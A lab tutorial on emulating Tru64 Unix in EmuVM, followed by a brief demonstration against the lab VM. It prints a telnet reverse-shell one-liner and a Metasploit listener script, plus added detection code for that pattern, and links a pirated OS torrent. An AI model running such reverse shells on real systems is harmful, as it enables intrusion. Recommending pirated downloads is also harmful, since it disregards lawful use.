Remote System Identification: Guide to Tru64 Unix system construction and penetration
As virtualization technology continues to develop, it brings more and more convenience and lets us simulate almost any device we can think of. Here we use it to build a Tru64 Unix operating system, which is not very common, and then use Metasploit to perform a simple penetration demonstration.
Tool Environment
Here we use an emulator named EmuVM. It is free virtualization software that supports both Windows and Linux, and it can be downloaded here: http://emuvm.com/downloads.php
This emulator can simulate a large number of Alpha servers and can be said to be the best choice for 64-bit Linux systems. I decided to write this article to record the process of building a Tru64 Unix system, and I will also use Metasploit for a simple penetration of the resulting environment.
First, we need to obtain an EmuVM installation file. Here I am using a stable version of the software, alphavm-free-1-3-9.tgz (http://emuvm.com/read.php?file=alphavm-free-1-3-9.tgz). The downloaded and decompressed folder contains two important files: the binary that starts the emulator, and the configuration file. I have attached my configuration file, which I use to simulate an AlphaServer DS10 616 MHz.
Here is the content of config.emu:
system {
    type = ds10_616;
    reported_type = default;
    num_cpus = 1;
    ssn = 'EmuVM-00-000-001';
    interval_clock_freq = 1000;
    memory { size = 512; }
    cpu {
        server = basic;
        jit { async = yes; }
    }
    serial com1 { server = socket; port = 3000; }
    serial com2 { server = socket; port = 3001; }
    scsi_controller qla0 { scsi_id = 7; }
    scsi_controller qla1 { scsi_id = 7; }
    scsi_disk dka0 {
        scsi_bus = 0;
        scsi_id = 0;
        scsi_lun = 0;
        file = 'disk.dd';
        caching = no;
        write_through = yes;
    }
    scsi_cdrom iso { scsi_id = 4; file = 'Tru64.iso'; }
    ether eth0 { type = dec21040; server = dummy; mac_address = 0x08002B000001; }
    ether eth1 { type = dec21040; server = tap; interface = 'tap0'; mac_address = 0x08002B000002; }
}
The important parts of the configuration file are the location of the virtual disk and the network card settings. Here I put all the files in the root directory. Before installation, we also need to prepare about 2 GB of space to hold the simulated system:
dd if=/dev/zero of=disk.dd bs=1024 count=2M
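To review which settings in config.emu reach outside the guest (serial consoles served over TCP sockets, NICs attached to host tap interfaces, and image files), the following added example parses the file and lists them. It is not part of the original article or of the emulator; the grammar is inferred only from the configuration shown above, and the function names are hypothetical.

```python
import re

# Grammar inferred only from the config.emu shown above (an assumption, not
# emulator documentation): "key = value;" settings and "kind [name] { ... }" blocks.
TOKEN = re.compile(r"'[^']*'|[{};=]|[^\s{};=]+")

def parse_block(tokens, pos=0):
    """Parse until the matching '}'; return (settings, child_blocks, next_pos)."""
    settings, children = {}, []
    while pos < len(tokens) and tokens[pos] != "}":
        head = []
        while tokens[pos] not in ("=", "{"):
            head.append(tokens[pos])
            pos += 1
        if tokens[pos] == "=":                      # key = value ;
            settings[head[0]] = tokens[pos + 1].strip("'")
            pos += 3
        else:                                       # kind [name] { ... }
            body, kids, pos = parse_block(tokens, pos + 1)
            children.append({"kind": head[0], "name": head[-1],
                             "settings": body, "children": kids})
            pos += 1                                # step over '}'
    return settings, children, pos

def host_touchpoints(text):
    """List settings that reach outside the guest: TCP consoles, tap NICs, images."""
    found = {"tcp_consoles": [], "tap_nics": [], "images": []}
    stack = parse_block(TOKEN.findall(text))[1]
    while stack:
        node = stack.pop()
        stack.extend(node["children"])
        s = node["settings"]
        if node["kind"] == "serial" and s.get("server") == "socket":
            found["tcp_consoles"].append((node["name"], int(s["port"])))
        if node["kind"] == "ether" and s.get("server") == "tap":
            found["tap_nics"].append((node["name"], s["interface"]))
        if "file" in s:
            found["images"].append((node["name"], s["file"]))
    return {key: sorted(values) for key, values in found.items()}

# Sample input: an excerpt of the configuration from this article.
SAMPLE = """system { type = ds10_616; memory { size = 512; }
  serial com1 { server = socket; port = 3000; }
  serial com2 { server = socket; port = 3001; }
  scsi_disk dka0 { scsi_bus = 0; scsi_id = 0; file = 'disk.dd'; caching = no; }
  scsi_cdrom iso { scsi_id = 4; file = 'Tru64.iso'; }
  ether eth0 { type = dec21040; server = dummy; mac_address = 0x08002B000001; }
  ether eth1 { type = dec21040; server = tap; interface = 'tap0'; } }"""

if __name__ == "__main__":
    for kind, items in host_touchpoints(SAMPLE).items():
        print(kind, items)
```

Each listed console port gives whoever can connect to it the machine's firmware console, so it is worth confirming on the host which address those ports are actually bound to.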
Virtual System Preparation
After this step, we need to install the Tru64 system. If you have an installation CD, you can simply convert the CD content into an ISO file. If you do not have one, you can find one on the Pirate Bay (https://thepiratebay.cr/torrent/5634366/Tru64_5.1B4).
Now you can start the VM with the ISO image. The command is as follows:
./alphavm_free config.emu
Then we can use socat to connect to the virtual machine. The command is as follows:
socat -,raw,echo=0,escape=0x1c tcp:127.0.0.1:3000
Of course, other tools such as telnet or PuTTY can also be used to connect to the virtual machine, but they may cause some problems, so I suggest using socat here.
user@Obelix:~/KVM/Alpha/Tru64$ ./connect.console.sh
System installation Configuration
Now we need the ISO image file to install Tru64. First we tell the virtual machine which device to boot from; here that is dka400 (the CD-ROM):
boot dka400
The ISO starts in single-user mode, from which we can carry out the system installation. It is not difficult if you follow the instructions step by step; I believe everyone has experience installing virtual machines.
After the installation is complete, you can boot directly from the hard disk:
boot dka0
The most important thing is to configure the network environment. Here I will show how to configure the virtual network card tap0 and the bridge interface with a simple script. I am using a notebook with two NICs: a wireless NIC with the interface wlan0, and a wired NIC with the interface eth0. Of these, eth0 is connected to the VM host, while the wireless card wlan0 is connected to the network. The following is my configuration script:
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 eth0
brctl setfd br0 0
ifconfig eth0 10.0.2.1 up
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
route add -net 0.0.0.0/0 gw 10.0.2.1
brctl addif br0 tap0
ifconfig tap0 0.0.0.0
iptables -A POSTROUTING -j MASQUERADE -s 10.0.2.0/24 -t nat
Before running this VM, I add a virtual NIC to it by adding the following content to the config.emu file:
ether eth1 {
    type = dec21040;
    server = tap;
    interface = 'tap0';
    mac_address = 0x08002B000002;
}
In the virtual machine, we need to specify the IP address, with the following configuration:
tu1: flags=c63<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST,SIMPLEX>
     inet 10.0.2.10 netmask ffffff00 broadcast 10.0.2.255 ipmtu 1500
Simple penetration testing
Now that the virtual machine is set up, we will perform a simple penetration test on it. Here we will still use a reverse shell, creating a backdoor file for the virtual machine to execute. The generated file is as follows:
sh -c '(sleep 4074|telnet 10.0.2.1 8000|while : ; do sh &&break; done 2>&1|telnet 10.0.2.1 8000 >/dev/null 2>&1&)'
Then we create a listener on the HOST:
#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo "***************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo " starting the meterpreter listener.."
./msfcli exploit/multi/handler PAYLOAD=cmd/unix/reverse LHOST=10.0.2.1 LPORT=$port E
Then we can see that our Metasploit receives a reverse shell.
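On the defending side, the command line above has a recognisable shape: two telnet clients to the same host and port with a shell running as a pipeline stage between them. The following added example, which is not part of the original article, flags that shape in process command lines; the process table is constructed sample data and the function names are hypothetical.

```python
import re
from collections import Counter

# telnet used as a raw TCP client: "telnet <host> <port>"
TELNET = re.compile(r"\btelnet\s+(\S+)\s+(\d{1,5})\b")
# A shell started as a pipeline stage, optionally wrapped in "while ...; do".
SHELL_STAGE = re.compile(
    r"\|\s*(?:while\b[^|]*?\bdo\s+)?(?:/\S+/)?(?:sh|ksh|csh|bash)\b")

def classify(cmdline):
    """Return (verdict, endpoint) for one process command line."""
    hits = list(TELNET.finditer(cmdline))
    if not hits:
        return ("clean", None)
    counts = Counter((m.group(1), int(m.group(2))) for m in hits)
    endpoint, seen = counts.most_common(1)[0]
    # Text between the first and last telnet client (empty if there is only one).
    between = cmdline[hits[0].end():hits[-1].start()]
    if seen >= 2 and SHELL_STAGE.search(between):
        return ("reverse-shell", endpoint)   # same endpoint twice, shell in between
    if SHELL_STAGE.search(cmdline[hits[0].end():]):
        return ("suspicious", endpoint)      # telnet output piped into a shell
    return ("clean", None)

def scan(process_table):
    """process_table: iterable of (pid, user, cmdline); return the flagged rows."""
    flagged = []
    for pid, user, cmdline in process_table:
        verdict, endpoint = classify(cmdline)
        if verdict != "clean":
            flagged.append((pid, user, verdict, endpoint))
    return flagged

# Constructed process table; pid 4112 carries the command line from this article.
SAMPLE = [
    (301, "root", "/usr/sbin/inetd"),
    (2207, "alice", "telnet 10.0.2.10 23"),
    (4112, "www", "sh -c (sleep 4074|telnet 10.0.2.1 8000|while : ; do sh &&break; "
                  "done 2>&1|telnet 10.0.2.1 8000 >/dev/null 2>&1&)"),
    (4150, "www", "telnet 10.0.2.1 8000 | /bin/sh"),
]

if __name__ == "__main__":
    for row in scan(SAMPLE):
        print(row)
```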
The main purpose of this article is instructional: to show how to build a system that is not in particularly common use. Here the author uses the HP Tru64 Unix system; I hope you gain something from it.